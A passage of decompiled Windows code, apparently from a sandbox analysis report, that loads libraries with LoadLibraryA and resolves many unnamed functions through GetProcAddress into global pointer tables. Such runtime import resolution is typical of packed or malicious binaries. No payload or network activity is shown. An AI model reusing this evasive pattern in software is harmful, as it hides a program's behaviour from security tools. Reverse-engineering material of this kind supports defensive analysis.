				struct HINSTANCE__* _t200;
				_Unknown_base(*)()* _t201;
				_Unknown_base(*)()* _t202;
				CHAR* _t203;
				_Unknown_base(*)()* _t204;
				struct HINSTANCE__* _t205;
				_Unknown_base(*)()* _t206;
				_Unknown_base(*)()* _t207;
				CHAR* _t208;
				_Unknown_base(*)()* _t209;
				struct HINSTANCE__* _t210;
				_Unknown_base(*)()* _t211;
				_Unknown_base(*)()* _t212;
				CHAR* _t213;
				_Unknown_base(*)()* _t214;
				struct HINSTANCE__* _t215;
				_Unknown_base(*)()* _t216;
				_Unknown_base(*)()* _t217;
				CHAR* _t218;
				_Unknown_base(*)()* _t219;
				struct HINSTANCE__* _t220;
				_Unknown_base(*)()* _t221;
				_Unknown_base(*)()* _t222;
				CHAR* _t223;
				_Unknown_base(*)()* _t224;
				struct HINSTANCE__* _t225;
				_Unknown_base(*)()* _t226;
				_Unknown_base(*)()* _t227;
				CHAR* _t228;
				_Unknown_base(*)()* _t229;
				struct HINSTANCE__* _t230;
				_Unknown_base(*)()* _t231;
				_Unknown_base(*)()* _t232;
				CHAR* _t233;
				_Unknown_base(*)()* _t234;
				struct HINSTANCE__* _t235;
				_Unknown_base(*)()* _t236;
				_Unknown_base(*)()* _t237;
				CHAR* _t238;
				_Unknown_base(*)()* _t239;
				struct HINSTANCE__* _t240;
				_Unknown_base(*)()* _t241;
				CHAR* _t243;
				_Unknown_base(*)()* _t244;
				struct HINSTANCE__* _t245;
				_Unknown_base(*)()* _t246;
				_Unknown_base(*)()* _t247;
				CHAR* _t248;
				_Unknown_base(*)()* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t252;
				CHAR* _t253;
				CHAR* _t254;
				CHAR* _t255;
				struct HINSTANCE__* _t256;
				CHAR* _t257;
				struct HINSTANCE__* _t258;
				CHAR* _t259;
				struct HINSTANCE__* _t260;
				CHAR* _t261;
				CHAR* _t262;
				CHAR* _t263;
				struct HINSTANCE__* _t264;
				CHAR* _t265;
				CHAR* _t266;
				CHAR* _t267;
				CHAR* _t268;
				CHAR* _t269;
				CHAR* _t270;
				CHAR* _t271;
				struct HINSTANCE__* _t272;
				CHAR* _t273;
				struct HINSTANCE__* _t274;
				CHAR* _t275;
				struct HINSTANCE__* _t276;
				CHAR* _t277;
				CHAR* _t278;
				struct HINSTANCE__* _t279;
				struct HINSTANCE__* _t280;
				CHAR* _t281;
				struct HINSTANCE__* _t282;
				CHAR* _t283;
				CHAR* _t284;
				CHAR* _t285;
				struct HINSTANCE__* _t286;
				CHAR* _t287;
				struct HINSTANCE__* _t288;
				CHAR* _t289;
				struct HINSTANCE__* _t290;
				CHAR* _t291;
				struct HINSTANCE__* _t292;
				CHAR* _t293;
				CHAR* _t294;
				struct HINSTANCE__* _t295;
				CHAR* _t296;
				struct HINSTANCE__* _t297;
				CHAR* _t298;
				struct HINSTANCE__* _t299;
				CHAR* _t300;
				struct HINSTANCE__* _t301;
				CHAR* _t302;
				CHAR* _t303;
				CHAR* _t304;
				CHAR* _t305;
				CHAR* _t306;
				struct HINSTANCE__* _t307;
				CHAR* _t308;
				CHAR* _t309;
				CHAR* _t310;
				struct HINSTANCE__* _t311;
				CHAR* _t312;
				struct HINSTANCE__* _t313;
				CHAR* _t314;
				struct HINSTANCE__* _t315;
				CHAR* _t316;
				struct HINSTANCE__* _t317;
				CHAR* _t318;
				struct HINSTANCE__* _t319;
				CHAR* _t320;
				struct HINSTANCE__* _t321;
				CHAR* _t322;
				struct HINSTANCE__* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				CHAR* _t326;
				struct HINSTANCE__* _t327;
				CHAR* _t328;
				struct HINSTANCE__* _t329;
				CHAR* _t330;
				struct HINSTANCE__* _t331;
				CHAR* _t332;
				struct HINSTANCE__* _t333;
				CHAR* _t334;
				struct HINSTANCE__* _t335;
				CHAR* _t336;
				struct HINSTANCE__* _t337;
				CHAR* _t338;
				struct HINSTANCE__* _t339;
				CHAR* _t340;
				struct HINSTANCE__* _t341;
				CHAR* _t342;
				struct HINSTANCE__* _t343;
				CHAR* _t344;
				struct HINSTANCE__* _t345;
				CHAR* _t346;
				struct HINSTANCE__* _t347;
				CHAR* _t348;
				CHAR* _t349;
				CHAR* _t350;
				CHAR* _t351;
				CHAR* _t352;
				CHAR* _t353;
				struct HINSTANCE__* _t354;
				CHAR* _t355;
				struct HINSTANCE__* _t356;
				CHAR* _t357;
				struct HINSTANCE__* _t358;
				CHAR* _t359;
				struct HINSTANCE__* _t360;
				CHAR* _t361;
				struct HINSTANCE__* _t362;
				CHAR* _t363;
				struct HINSTANCE__* _t364;
				CHAR* _t365;
				struct HINSTANCE__* _t366;
				CHAR* _t367;
				struct HINSTANCE__* _t368;
				CHAR* _t369;
				struct HINSTANCE__* _t370;
				CHAR* _t371;
				CHAR* _t372;
				struct HINSTANCE__* _t373;
				CHAR* _t374;
				CHAR* _t375;
				CHAR* _t376;
				struct HINSTANCE__* _t377;
				CHAR* _t378;
				struct HINSTANCE__* _t379;
				CHAR* _t380;
				struct HINSTANCE__* _t381;
				CHAR* _t382;
				struct HINSTANCE__* _t383;
				CHAR* _t384;
				struct HINSTANCE__* _t385;
				CHAR* _t386;
				struct HINSTANCE__* _t387;
				CHAR* _t388;
				struct HINSTANCE__* _t389;
				CHAR* _t390;
				struct HINSTANCE__* _t391;
				CHAR* _t392;
				struct HINSTANCE__* _t393;
				CHAR* _t394;
				struct HINSTANCE__* _t395;
				CHAR* _t396;
				struct HINSTANCE__* _t397;
				CHAR* _t398;
				struct HINSTANCE__* _t399;
				CHAR* _t400;
				struct HINSTANCE__* _t401;
				CHAR* _t402;
				struct HINSTANCE__* _t403;
				CHAR* _t404;
				struct HINSTANCE__* _t405;
				CHAR* _t406;
				struct HINSTANCE__* _t407;
				CHAR* _t408;
				struct HINSTANCE__* _t409;
				CHAR* _t410;
				struct HINSTANCE__* _t411;
				CHAR* _t412;
				struct HINSTANCE__* _t413;
				CHAR* _t414;
				struct HINSTANCE__* _t415;
				CHAR* _t416;
				struct HINSTANCE__* _t417;
				CHAR* _t418;
				struct HINSTANCE__* _t419;
				CHAR* _t420;
				struct HINSTANCE__* _t421;
				CHAR* _t422;
				struct HINSTANCE__* _t423;
				CHAR* _t424;
				struct HINSTANCE__* _t425;
				CHAR* _t426;
				struct HINSTANCE__* _t427;
				CHAR* _t428;
				struct HINSTANCE__* _t429;
				CHAR* _t430;
				struct HINSTANCE__* _t431;
				CHAR* _t432;
				struct HINSTANCE__* _t433;
				CHAR* _t434;
				struct HINSTANCE__* _t435;
				CHAR* _t436;
				struct HINSTANCE__* _t437;
				CHAR* _t438;
				struct HINSTANCE__* _t439;
				CHAR* _t440;
				struct HINSTANCE__* _t441;
				CHAR* _t442;

				_t1 =  *0x4648ac; // 0x74ca0000
				if(_t1 != 0) {
					_t309 =  *0x45334c; // 0x25c8ac8
					_t154 = GetProcAddress(_t1, _t309);
					_t404 =  *0x453358; // 0x25c7608
					 *0x464898 = _t154;
					_t155 =  *0x4648ac; // 0x74ca0000
					_t156 = GetProcAddress(_t155, _t404);
					_t310 =  *0x4533e4; // 0x25c8cc0
					_t405 =  *0x4648ac; // 0x74ca0000
					 *0x464918 = _t156;
					_t157 = GetProcAddress(_t405, _t310);
					_t311 =  *0x4648ac; // 0x74ca0000
					 *0x464880 = _t157;
					_t158 =  *0x453990; // 0x25c6930
					_t159 = GetProcAddress(_t311, _t158);
					_t406 =  *0x453a0c; // 0x25c8d50
					 *0x464754 = _t159;
					_t160 =  *0x4648ac; // 0x74ca0000
					_t161 = GetProcAddress(_t160, _t406);
					_t312 =  *0x45376c; // 0x25c7628
					_t407 =  *0x4648ac; // 0x74ca0000
					 *0x46474c = _t161;
					_t162 = GetProcAddress(_t407, _t312);
					_t313 =  *0x4648ac; // 0x74ca0000
					 *0x4647f8 = _t162;
					_t163 =  *0x4533d4; // 0x25c8ba0
					_t164 = GetProcAddress(_t313, _t163);
					_t408 =  *0x453654; // 0x25c8c30
					 *0x464908 = _t164;
					_t165 =  *0x4648ac; // 0x74ca0000
					_t166 = GetProcAddress(_t165, _t408);
					_t314 =  *0x453aa8; // 0x25c8b88
					_t409 =  *0x4648ac; // 0x74ca0000
					 *0x464844 = _t166;
					_t167 = GetProcAddress(_t409, _t314);
					_t315 =  *0x4648ac; // 0x74ca0000
					 *0x4648bc = _t167;
					_t168 =  *0x453a1c; // 0x25c8a98
					_t169 = GetProcAddress(_t315, _t168);
					_t410 =  *0x4539f4; // 0x25c8b10
					 *0x4646f4 = _t169;
					_t170 =  *0x4648ac; // 0x74ca0000
					_t171 = GetProcAddress(_t170, _t410);
					_t316 =  *0x453b88; // 0x25c8ae0
					_t411 =  *0x4648ac; // 0x74ca0000
					 *0x4648d0 = _t171;
					_t172 = GetProcAddress(_t411, _t316);
					_t317 =  *0x4648ac; // 0x74ca0000
					 *0x46481c = _t172;
					_t173 =  *0x4535a4; // 0x25c8c48
					_t174 = GetProcAddress(_t317, _t173);
					_t412 =  *0x45388c; // 0x25c7648
					 *0x4646f8 = _t174;
					_t175 =  *0x4648ac; // 0x74ca0000
					_t176 = GetProcAddress(_t175, _t412);
					_t318 =  *0x453828; // 0x25c8b28
					_t413 =  *0x4648ac; // 0x74ca0000
					 *0x4647f4 = _t176;
					_t177 = GetProcAddress(_t413, _t318);
					_t319 =  *0x4648ac; // 0x74ca0000
					 *0x464758 = _t177;
					_t178 =  *0x4538b4; // 0x25c8b58
					_t179 = GetProcAddress(_t319, _t178);
					_t414 =  *0x453348; // 0x25c8bb8
					 *0x464738 = _t179;
					_t180 =  *0x4648ac; // 0x74ca0000
					_t181 = GetProcAddress(_t180, _t414);
					_t320 =  *0x453a5c; // 0x25c76a8
					_t415 =  *0x4648ac; // 0x74ca0000
					 *0x46490c = _t181;
					_t182 = GetProcAddress(_t415, _t320);
					_t321 =  *0x4648ac; // 0x74ca0000
					 *0x4646d4 = _t182;
					_t183 =  *0x4538a0; // 0x25c8c60
					_t184 = GetProcAddress(_t321, _t183);
					_t416 =  *0x453958; // 0x25c8c78
					 *0x464920 = _t184;
					_t185 =  *0x4648ac; // 0x74ca0000
					_t186 = GetProcAddress(_t185, _t416);
					_t322 =  *0x4535a0; // 0x25c8cf0
					_t417 =  *0x4648ac; // 0x74ca0000
					 *0x464778 = _t186;
					_t187 = GetProcAddress(_t417, _t322);
					_t323 =  *0x4648ac; // 0x74ca0000
					 *0x4646e8 = _t187;
					_t188 =  *0x453830; // 0x25c8c90
					_t189 = GetProcAddress(_t323, _t188);
					_t418 =  *0x453704; // 0x25c8ca8
					 *0x464828 = _t189;
					_t190 =  *0x4648ac; // 0x74ca0000
					_t191 = GetProcAddress(_t190, _t418);
					_t324 =  *0x45340c; // 0x25c8df8
					_t419 =  *0x4648ac; // 0x74ca0000
					 *0x4647d8 = _t191;
					_t192 = GetProcAddress(_t419, _t324);
					_t325 =  *0x4648ac; // 0x74ca0000
					 *0x46470c = _t192;
					_t193 =  *0x4534d4; // 0x25c8e28
					_t194 = GetProcAddress(_t325, _t193);
					_t420 =  *0x4536ac; // 0x25c8e10
					 *0x4646a0 = _t194;
					_t195 =  *0x4648ac; // 0x74ca0000
					_t196 = GetProcAddress(_t195, _t420);
					_t326 =  *0x4537cc; // 0x25c8e40
					_t421 =  *0x4648ac; // 0x74ca0000
					 *0x46491c = _t196;
					 *0x46472c = GetProcAddress(_t421, _t326);
					_t198 =  *0x4534f8; // 0x25c76c8
					_t327 =  *0x4648ac; // 0x74ca0000
					_t199 = GetProcAddress(_t327, _t198);
					_t422 =  *0x45380c; // 0x25c8d98
					 *0x4647d4 = _t199;
					_t200 =  *0x4648ac; // 0x74ca0000
					_t201 = GetProcAddress(_t200, _t422);
					_t328 =  *0x4538e4; // 0x25c8db0
					_t423 =  *0x4648ac; // 0x74ca0000
					 *0x464850 = _t201;
					_t202 = GetProcAddress(_t423, _t328);
					_t329 =  *0x4648ac; // 0x74ca0000
					 *0x4646ac = _t202;
					_t203 =  *0x453b68; // 0x25c7728
					_t204 = GetProcAddress(_t329, _t203);
					_t424 =  *0x453938; // 0x25c69d0
					 *0x4648f0 = _t204;
					_t205 =  *0x4648ac; // 0x74ca0000
					_t206 = GetProcAddress(_t205, _t424);
					_t330 =  *0x4536f0; // 0x25c8e58
					_t425 =  *0x4648ac; // 0x74ca0000
					 *0x464910 = _t206;
					_t207 = GetProcAddress(_t425, _t330);
					_t331 =  *0x4648ac; // 0x74ca0000
					 *0x464708 = _t207;
					_t208 =  *0x453354; // 0x25c8de0
					_t209 = GetProcAddress(_t331, _t208);
					_t426 =  *0x453764; // 0x25c7748
					 *0x464764 = _t209;
					_t210 =  *0x4648ac; // 0x74ca0000
					_t211 = GetProcAddress(_t210, _t426);
					_t332 =  *0x45387c; // 0x25c8dc8
					_t427 =  *0x4648ac; // 0x74ca0000
					 *0x4646d8 = _t211;
					_t212 = GetProcAddress(_t427, _t332);
					_t333 =  *0x4648ac; // 0x74ca0000
					 *0x464710 = _t212;
					_t213 =  *0x45347c; // 0x25c9120
					_t214 = GetProcAddress(_t333, _t213);
					_t428 =  *0x453600; // 0x25c7768
					 *0x4648e8 = _t214;
					_t215 =  *0x4648ac; // 0x74ca0000
					_t216 = GetProcAddress(_t215, _t428);
					_t334 =  *0x45353c; // 0x25c90f0
					_t429 =  *0x4648ac; // 0x74ca0000
					 *0x464804 = _t216;
					_t217 = GetProcAddress(_t429, _t334);
					_t335 =  *0x4648ac; // 0x74ca0000
					 *0x4647e8 = _t217;
					_t218 =  *0x453a08; // 0x25c9048
					_t219 = GetProcAddress(_t335, _t218);
					_t430 =  *0x453960; // 0x25c90d8
					 *0x46489c = _t219;
					_t220 =  *0x4648ac; // 0x74ca0000
					_t221 = GetProcAddress(_t220, _t430);
					_t336 =  *0x4534ac; // 0x25c7788
					_t431 =  *0x4648ac; // 0x74ca0000
					 *0x464760 = _t221;
					_t222 = GetProcAddress(_t431, _t336);
					_t337 =  *0x4648ac; // 0x74ca0000
					 *0x4647b0 = _t222;
					_t223 =  *0x4533d0; // 0x25c74e8
					_t224 = GetProcAddress(_t337, _t223);
					_t432 =  *0x453334; // 0x25c7508
					 *0x4646a4 = _t224;
					_t225 =  *0x4648ac; // 0x74ca0000
					_t226 = GetProcAddress(_t225, _t432);
					_t338 =  *0x453790; // 0x25c9030
					_t433 =  *0x4648ac; // 0x74ca0000
					 *0x464870 = _t226;
					_t227 = GetProcAddress(_t433, _t338);
					_t339 =  *0x4648ac; // 0x74ca0000
					 *0x46485c = _t227;
					_t228 =  *0x453788; // 0x25c91b0
					_t229 = GetProcAddress(_t339, _t228);
					_t434 =  *0x453338; // 0x25c7448
					 *0x464818 = _t229;
					_t230 =  *0x4648ac; // 0x74ca0000
					_t231 = GetProcAddress(_t230, _t434);
					_t340 =  *0x453438; // 0x25c7488
					_t435 =  *0x4648ac; // 0x74ca0000
					 *0x4648f4 = _t231;
					_t232 = GetProcAddress(_t435, _t340);
					_t341 =  *0x4648ac; // 0x74ca0000
					 *0x4646e4 = _t232;
					_t233 =  *0x453498; // 0x25c6a20
					_t234 = GetProcAddress(_t341, _t233);
					_t436 =  *0x453a80; // 0x25c7128
					 *0x4647f0 = _t234;
					_t235 =  *0x4648ac; // 0x74ca0000
					_t236 = GetProcAddress(_t235, _t436);
					_t342 =  *0x4539c8; // 0x25c7368
					_t437 =  *0x4648ac; // 0x74ca0000
					 *0x464730 = _t236;
					_t237 = GetProcAddress(_t437, _t342);
					_t343 =  *0x4648ac; // 0x74ca0000
					 *0x4646ec = _t237;
					_t238 =  *0x453ae0; // 0x25c8f10
					_t239 = GetProcAddress(_t343, _t238);
					_t438 =  *0x453ba8; // 0x25c9060
					 *0x4648cc = _t239;
					_t240 =  *0x4648ac; // 0x74ca0000
					_t241 = GetProcAddress(_t240, _t438);
					_t344 =  *0x4535c0; // 0x25c9198
					_t439 =  *0x4648ac; // 0x74ca0000
					 *0x4646c0 = _t241;
					 *0x464848 = GetProcAddress(_t439, _t344);
					_t243 =  *0x453754; // 0x25c6a98
					_t345 =  *0x4648ac; // 0x74ca0000
					_t244 = GetProcAddress(_t345, _t243);
					_t440 =  *0x453440; // 0x25c9108
					 *0x4648a4 = _t244;
					_t245 =  *0x4648ac; // 0x74ca0000
					_t246 = GetProcAddress(_t245, _t440);
					_t346 =  *0x4534bc; // 0x25c8fd0
					_t441 =  *0x4648ac; // 0x74ca0000
					 *0x464714 = _t246;
					_t247 = GetProcAddress(_t441, _t346);
					_t347 =  *0x4648ac; // 0x74ca0000
					 *0x4647ec = _t247;
					_t248 =  *0x4539fc; // 0x25c73c8
					_t249 = GetProcAddress(_t347, _t248);
					_t442 =  *0x45373c; // 0x25c74a8
					 *0x464744 = _t249;
					_t250 =  *0x4648ac; // 0x74ca0000
					 *0x464694 = GetProcAddress(_t250, _t442);
				}
				_t252 =  *0x45365c; // 0x25c60c8
				_t2 = LoadLibraryA(_t252);
				_t348 =  *0x4534e0; // 0x25c6110
				 *0x464874 = _t2;
				 *0x464780 = LoadLibraryA(_t348);
				_t4 =  *0x453624; // 0x25c6d98
				_t5 = LoadLibraryA(_t4);
				_t253 =  *0x453410; // 0x25c6080
				 *0x464720 = _t5;
				_t6 = LoadLibraryA(_t253);
				_t349 =  *0x453a88; // 0x25c6098
				 *0x4647c8 = _t6;
				 *0x4647bc = LoadLibraryA(_t349);
				_t8 =  *0x453398; // 0x25c60b0
				_t9 = LoadLibraryA(_t8);
				_t254 =  *0x453558; // 0x25c6230
				 *0x4648e4 = _t9; // executed
				_t10 = LoadLibraryA(_t254);
				_t350 =  *0x453538; // 0x25c9090
				 *0x464794 = _t10; // executed
				_t11 = LoadLibraryA(_t350); // executed
				 *0x4648d8 = _t11;
				_t12 =  *0x453964; // 0x25c9180
				_t13 = LoadLibraryA(_t12);
				_t255 =  *0x453848; // 0x25c8f28
				 *0x4647ac = _t13; // executed
				_t14 = LoadLibraryA(_t255);
				_t351 =  *0x4536d8; // 0x25c8fe8
				 *0x4648c8 = _t14; // executed
				_t15 = LoadLibraryA(_t351); // executed
				 *0x464784 = _t15;
				_t16 =  *0x464874; // 0x738e0000
				if(_t16 != 0) {
					_t305 =  *0x4533f4; // 0x25c69f8
					_t145 = GetProcAddress(_t16, _t305);
					_t400 =  *0x453adc; // 0x25c5c40
					 *0x4647a4 = _t145;
					_t146 =  *0x464874; // 0x738e0000
					_t147 = GetProcAddress(_t146, _t400);
					_t306 =  *0x453894; // 0x25c6980
					_t401 =  *0x464874; // 0x738e0000
					 *0x464858 = _t147;
					_t148 = GetProcAddress(_t401, _t306);
					_t307 =  *0x464874; // 0x738e0000
					 *0x464750 = _t148;
					_t149 =  *0x4536a0; // 0x25c5fa0
					_t150 = GetProcAddress(_t307, _t149);
					_t402 =  *0x4538ac; // 0x25c6c00
					 *0x464728 = _t150;
					_t151 =  *0x464874; // 0x738e0000
					_t152 = GetProcAddress(_t151, _t402);
					_t308 =  *0x4533ac; // 0x25c60f8
					_t403 =  *0x464874; // 0x738e0000
					 *0x464704 = _t152;
					 *0x4648a8 = GetProcAddress(_t403, _t308);
				}
				_t17 =  *0x464780; // 0x76dc0000
				if(_t17 != 0) {
					_t303 =  *0x453690; // 0x25c5c80
					_t141 = GetProcAddress(_t17, _t303);
					_t398 =  *0x453428; // 0x25c7348
					 *0x464768 = _t141;
					_t142 =  *0x464780; // 0x76dc0000
					_t143 = GetProcAddress(_t142, _t398);
					_t304 =  *0x4533b8; // 0x25c5d00
					_t399 =  *0x464780; // 0x76dc0000
					 *0x46469c = _t143;
					 *0x464820 = GetProcAddress(_t399, _t304);
				}
				_t18 =  *0x464698; // 0x76a00000
				if(_t18 != 0) {
					_t293 =  *0x453a70; // 0x25c6ed0
					_t117 = GetProcAddress(_t18, _t293);
					_t388 =  *0x4538c4; // 0x25c5d40
					 *0x464788 = _t117;
					_t118 =  *0x464698; // 0x76a00000
					_t119 = GetProcAddress(_t118, _t388);
					_t294 =  *0x45349c; // 0x25c6e28
					_t389 =  *0x464698; // 0x76a00000
					 *0x46476c = _t119;
					_t120 = GetProcAddress(_t389, _t294);
					_t295 =  *0x464698; // 0x76a00000
					 *0x464810 = _t120;
					_t121 =  *0x453b14; // 0x25c6d38
					_t122 = GetProcAddress(_t295, _t121);
					_t390 =  *0x453680; // 0x25c6fd8
					 *0x4648ec = _t122;
					_t123 =  *0x464698; // 0x76a00000
					_t124 = GetProcAddress(_t123, _t390);
					_t296 =  *0x453544; // 0x25c6f18
					_t391 =  *0x464698; // 0x76a00000
					 *0x4646a8 = _t124;
					_t125 = GetProcAddress(_t391, _t296);
					_t297 =  *0x464698; // 0x76a00000
					 *0x4648b4 = _t125;
					_t126 =  *0x453974; // 0x25c6f00
					_t127 = GetProcAddress(_t297, _t126);
					_t392 =  *0x453944; // 0x25c11d8
					 *0x464748 = _t127;
					_t128 =  *0x464698; // 0x76a00000
					_t129 = GetProcAddress(_t128, _t392);
					_t298 =  *0x453ae8; // 0x25c5de0
					_t393 =  *0x464698; // 0x76a00000
					 *0x46478c = _t129;
					_t130 = GetProcAddress(_t393, _t298);
					_t299 =  *0x464698; // 0x76a00000
					 *0x4646b0 = _t130;
					_t131 =  *0x453ba4; // 0x25c8f40
					_t132 = GetProcAddress(_t299, _t131);
					_t394 =  *0x4538d4; // 0x25c7468
					 *0x464900 = _t132;
					_t133 =  *0x464698; // 0x76a00000
					_t134 = GetProcAddress(_t133, _t394);
					_t300 =  *0x4539bc; // 0x25c71c8
					_t395 =  *0x464698; // 0x76a00000
					 *0x4648b0 = _t134;
					_t135 = GetProcAddress(_t395, _t300);
					_t301 =  *0x464698; // 0x76a00000
					 *0x464770 = _t135;
					_t136 =  *0x453700; // 0x25c9078
					_t137 = GetProcAddress(_t301, _t136);
					_t396 =  *0x453520; // 0x25c9018
					 *0x4647dc = _t137;
					_t138 =  *0x464698; // 0x76a00000
					_t139 = GetProcAddress(_t138, _t396);
					_t302 =  *0x453ab0; // 0x25c8ef8
					_t397 =  *0x464698; // 0x76a00000
					 *0x464888 = _t139;
					 *0x464700 = GetProcAddress(_t397, _t302);
				}
				_t19 =  *0x464720; // 0x6f1d0000
				if(_t19 != 0) {
					_t284 =  *0x453588; // 0x25c5ea0
					_t96 = GetProcAddress(_t19, _t284);
					_t380 =  *0x453908; // 0x25c5d80
					 *0x464798 = _t96;
					_t97 =  *0x464720; // 0x6f1d0000
					_t98 = GetProcAddress(_t97, _t380);
					_t285 =  *0x4538f4; // 0x25c5fc0
					_t381 =  *0x464720; // 0x6f1d0000
					 *0x4647c0 = _t98;
					_t99 = GetProcAddress(_t381, _t285);
					_t286 =  *0x464720; // 0x6f1d0000
					 *0x46487c = _t99;
					_t100 =  *0x4538b8; // 0x25c5da0
					_t101 = GetProcAddress(_t286, _t100);
					_t382 =  *0x453598; // 0x25c5dc0
					 *0x4648fc = _t101;
					_t102 =  *0x464720; // 0x6f1d0000
					_t103 = GetProcAddress(_t102, _t382);
					_t287 =  *0x453804; // 0x25c6f48
					_t383 =  *0x464720; // 0x6f1d0000
					 *0x4648b8 = _t103;
					_t104 = GetProcAddress(_t383, _t287);
					_t288 =  *0x464720; // 0x6f1d0000
					 *0x46479c = _t104;
					_t105 =  *0x453ac8; // 0x25c7808
					_t106 = GetProcAddress(_t288, _t105);
					_t384 =  *0x453730; // 0x25c6d50
					 *0x4646cc = _t106;
					_t107 =  *0x464720; // 0x6f1d0000
					_t108 = GetProcAddress(_t107, _t384);
					_t289 =  *0x453b58; // 0x25c77e8
					_t385 =  *0x464720; // 0x6f1d0000
					 *0x464914 = _t108;
					_t109 = GetProcAddress(_t385, _t289);
					_t290 =  *0x464720; // 0x6f1d0000
					 *0x4647e0 = _t109;
					_t110 =  *0x4535b4; // 0x25c7588
					_t111 = GetProcAddress(_t290, _t110);
					_t386 =  *0x4537d4; // 0x25c78a8
					 *0x4647a0 = _t111;
					_t112 =  *0x464720; // 0x6f1d0000
					_t113 = GetProcAddress(_t112, _t386);
					_t291 =  *0x453b38; // 0x25c7828
					_t387 =  *0x464720; // 0x6f1d0000
					 *0x464690 = _t113;
					_t114 = GetProcAddress(_t387, _t291);
					_t292 =  *0x464720; // 0x6f1d0000
					 *0x46477c = _t114;
					_t115 =  *0x453ac4; // 0x25c72a8
					 *0x46473c = GetProcAddress(_t292, _t115);
				}
				_t20 =  *0x4647c8; // 0x751f0000
				if(_t20 != 0) {
					_t375 =  *0x4535b0; // 0x25c7868
					_t85 = GetProcAddress(_t20, _t375);
					_t280 =  *0x4647c8; // 0x751f0000
					 *0x4646fc = _t85;
					_t86 =  *0x4539d0; // 0x25c6de0
					_t87 = GetProcAddress(_t280, _t86);
					_t376 =  *0x4535fc; // 0x25c6460
					 *0x4646dc = _t87;
					_t88 =  *0x4647c8; // 0x751f0000
					_t89 = GetProcAddress(_t88, _t376);
					_t281 =  *0x453994; // 0x25c6e40
					_t377 =  *0x4647c8; // 0x751f0000
					 *0x4646bc = _t89;
					_t90 = GetProcAddress(_t377, _t281);
					_t282 =  *0x4647c8; // 0x751f0000
					 *0x464878 = _t90;
					_t91 =  *0x453838; // 0x25c6ff0
					_t92 = GetProcAddress(_t282, _t91);
					_t378 =  *0x4534c8; // 0x25c6f30
					 *0x464814 = _t92;
					_t93 =  *0x4647c8; // 0x751f0000
					_t94 = GetProcAddress(_t93, _t378);
					_t283 =  *0x453b70; // 0x25c76e8
					_t379 =  *0x4647c8; // 0x751f0000
					 *0x4647a8 = _t94;
					 *0x464790 = GetProcAddress(_t379, _t283);
				}
				_t21 =  *0x4647bc; // 0x75240000
				if(_t21 != 0) {
					_t277 =  *0x453840; // 0x25c7888
					_t77 = GetProcAddress(_t21, _t277);
					_t372 =  *0x453650; // 0x25c6e58
					 *0x464718 = _t77;
					_t78 =  *0x4647bc; // 0x75240000
					_t79 = GetProcAddress(_t78, _t372);
					_t278 =  *0x453b34; // 0x25c90a8
					_t373 =  *0x4647bc; // 0x75240000
					 *0x464868 = _t79;
					_t80 = GetProcAddress(_t373, _t278);
					_t279 =  *0x4647bc; // 0x75240000
					 *0x464884 = _t80;
					_t81 =  *0x453484; // 0x25c74c8
					_t82 = GetProcAddress(_t279, _t81);
					_t374 =  *0x453738; // 0x25c7148
					 *0x4647cc = _t82;
					_t83 =  *0x4647bc; // 0x75240000
					 *0x4646c8 = GetProcAddress(_t83, _t374);
				}
				_t22 =  *0x4648e4; // 0x748f0000
				if(_t22 != 0) {
					_t270 =  *0x4539c0; // 0x25c77a8
					_t59 = GetProcAddress(_t22, _t270);
					_t365 =  *0x453758; // 0x25c6e10
					 *0x4646b8 = _t59;
					_t60 =  *0x4648e4; // 0x748f0000
					_t61 = GetProcAddress(_t60, _t365);
					_t271 =  *0x4539ac; // 0x25c77c8
					_t366 =  *0x4648e4; // 0x748f0000
					 *0x464864 = _t61;
					_t62 = GetProcAddress(_t366, _t271);
					_t272 =  *0x4648e4; // 0x748f0000
					 *0x464830 = _t62;
					_t63 =  *0x453a00; // 0x25c6fa8
					_t64 = GetProcAddress(_t272, _t63);
					_t367 =  *0x4539f8; // 0x25c6580
					 *0x4646c4 = _t64;
					_t65 =  *0x4648e4; // 0x748f0000
					_t66 = GetProcAddress(_t65, _t367);
					_t273 =  *0x45364c; // 0x25c6d68
					_t368 =  *0x4648e4; // 0x748f0000
					 *0x4648e0 = _t66;
					_t67 = GetProcAddress(_t368, _t273);
					_t274 =  *0x4648e4; // 0x748f0000
					 *0x4646b4 = _t67;
					_t68 =  *0x4538a8; // 0x25c7668
					_t69 = GetProcAddress(_t274, _t68);
					_t369 =  *0x4535d0; // 0x25c7708
					 *0x46483c = _t69;
					_t70 =  *0x4648e4; // 0x748f0000
					_t71 = GetProcAddress(_t70, _t369);
					_t275 =  *0x4536c8; // 0x25c8f58
					_t370 =  *0x4648e4; // 0x748f0000
					 *0x4648f8 = _t71;
					_t72 = GetProcAddress(_t370, _t275);
					_t276 =  *0x4648e4; // 0x748f0000
					 *0x464904 = _t72;
					_t73 =  *0x453868; // 0x25c9138
					_t74 = GetProcAddress(_t276, _t73);
					_t371 =  *0x4536d4; // 0x25c91c8
					 *0x4648a0 = _t74;
					_t75 =  *0x4648e4; // 0x748f0000
					 *0x4648d4 = GetProcAddress(_t75, _t371);
				}
				_t23 =  *0x464794; // 0x77080000
				if(_t23 != 0) {
					_t268 =  *0x4536f8; // 0x25c7848
					_t55 = GetProcAddress(_t23, _t268);
					_t363 =  *0x453904; // 0x25c75c8
					 *0x46488c = _t55;
					_t56 =  *0x464794; // 0x77080000
					_t57 = GetProcAddress(_t56, _t363);
					_t269 =  *0x4539e0; // 0x25c78c8
					_t364 =  *0x464794; // 0x77080000
					 *0x4646f0 = _t57;
					 *0x4647e4 = GetProcAddress(_t364, _t269);
				}
				_t24 =  *0x4648d8; // 0x75340000
				if(_t24 != 0) {
					_t266 =  *0x4536bc; // 0x25c8ee0
					_t51 = GetProcAddress(_t24, _t266);
					_t361 =  *0x45339c; // 0x25c7188
					 *0x4648c4 = _t51;
					_t52 =  *0x4648d8; // 0x75340000
					_t53 = GetProcAddress(_t52, _t361);
					_t267 =  *0x4535a8; // 0x25c72e8
					_t362 =  *0x4648d8; // 0x75340000
					 *0x4647b8 = _t53;
					 *0x464840 = GetProcAddress(_t362, _t267);
				}
				_t25 =  *0x4647ac; // 0x769b0000
				if(_t25 != 0) {
					_t262 =  *0x453694; // 0x25c90c0
					_t42 = GetProcAddress(_t25, _t262);
					_t357 =  *0x4533dc; // 0x25c9150
					 *0x464924 = _t42;
					_t43 =  *0x4647ac; // 0x769b0000
					_t44 = GetProcAddress(_t43, _t357);
					_t263 =  *0x453494; // 0x25c9168
					_t358 =  *0x4647ac; // 0x769b0000
